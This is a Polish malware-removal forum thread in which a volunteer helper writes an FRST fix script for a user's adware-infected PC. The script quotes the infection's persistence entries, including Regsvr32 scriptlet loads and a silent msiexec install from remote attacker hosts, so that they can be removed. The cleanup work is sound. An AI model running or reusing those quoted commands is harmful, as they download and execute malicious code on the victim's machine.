Problem z komputerem - yac another cleaner

Norbi28 · 2 Maja 2017

Witam,

od niedawna mam problem z komputerem,przypuszczam ze jest to związane z programem yac another cleaner który mi się zainstalował,,nie mogę go niestety usunąć

otwierają się co chwila inne strony z przegladarki,prośba o pomoc,

w załączeniu logi frst

Po pierwsze założyłeś temat na dwóch forach, czyli tu i na Pclab - (KLIK). To zagranie traktowane jest przez pomocników jako nie fair. Bo i ja mogłem stracić czas i Filutka78, która pomaga na Pclab analizując temat jednocześnie.

Odpowiedziałem już tutaj, bo tu zauważyłem temat jako pierwszy. Rozumiem, że chcesz otrzymać pomoc szybko, ale pomocnicy robią to po pracy, po godzinach i nie jesteśmy w stanie zwiększyć tempa.

Temat przetwarzam warunkowo. //Miszel03

Edytowane 2 Maja 2017 przez Miszel03
Dodaje notatkę moderacyjną do posta.

Miszel03 · 2 Maja 2017

System jest mocno zainfekowany przez programu typu adware / PUP. Tytułowy YAC jest widoczny i jeśli nie uda się go odinstalować normalnie to zrobi to automatycznie AdwCleaner.

Ty prosisz mnie o pomoc, - ja Ci pomogę, ale proszę doceń nasze starania i przeczytaj o Portale z oprogramowaniem / Instalatory - na co uważać.

1. Przez panel sterowania odinstaluj:

Wątpliwe skanery / fałszywe oprogramowanie: YAC(Yet Another Cleaner!)*.
Przestarzałe i nieskuteczne już programy: Spybot - Search & Destroy.

* - jeśli się nie powiedzie to proszę spróbować to zrobić z poziomu Trybu Awaryjnego (klik w klawisz F8 przed startem systemu).

2. Otwórz Notatnik w nim wklej:

CloseProcesses:
CreateRestorePoint:
Task: {0BE84C32-6204-49DD-A2D5-16BD1766244E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll
Task: {4394A7B2-212D-4BAB-A580-8DEA3DE21774} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () 
C:\Program Files (x86)\MIO
Task: {A5242023-7278-4F8D-A264-CB9370714F70} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll
ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Eastness
RemoveDirectory: C:\Users\Norbert\AppData\Local\Eastness
AlternateDataStreams: C:\ProgramData\Temp:07BF512B [129]
FirewallRules: [{CDBB5FAE-B6D9-459C-94BA-C7556DAC703D}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-859463877-3988447155-127319224-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== /q
HKU\S-1-5-21-859463877-3988447155-127319224-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
HKU\S-1-5-21-859463877-3988447155-127319224-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
HKU\S-1-5-21-859463877-3988447155-127319224-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://startsear.ch/?aff=2&src=sp&cf=f612bbec-f919-11e1-bf52-0008caceadae&q={searchTerms}
SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms}
SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {7DC5DCC1-3C36-4DC9-89E0-ABAEA354E1C3} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYPL&apn_uid=60D452B4-09CD-4A8F-8AF9-187B1C1AF368&apn_sauid=CCFA6486-ADEA-4D51-9139-CF026C3432B5
BHO-x32: Brak nazwy -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> Brak pliku
Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  Brak pliku
S4 3DM; C:\Users\Norbert\AppData\Local\3DM\Kitty.dll [754688 2017-04-20] () [brak podpisu cyfrowego]
R2 WinSAPSvc; C:\Users\Norbert\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [brak podpisu cyfrowego] 
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
R2 SNARE; C:\Users\Norbert\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego]
U3 DfSdkS; Brak ImagePath
C:\Users\Public\Desktop\ASUS\Entertainment\Game Park Console.lnk
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt (raport wynikowy).

3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox:

Odłącz synchronizację (o ile włączona): KLIK.
Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
Menu Historia > Wyczyść historię przeglądania.
Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.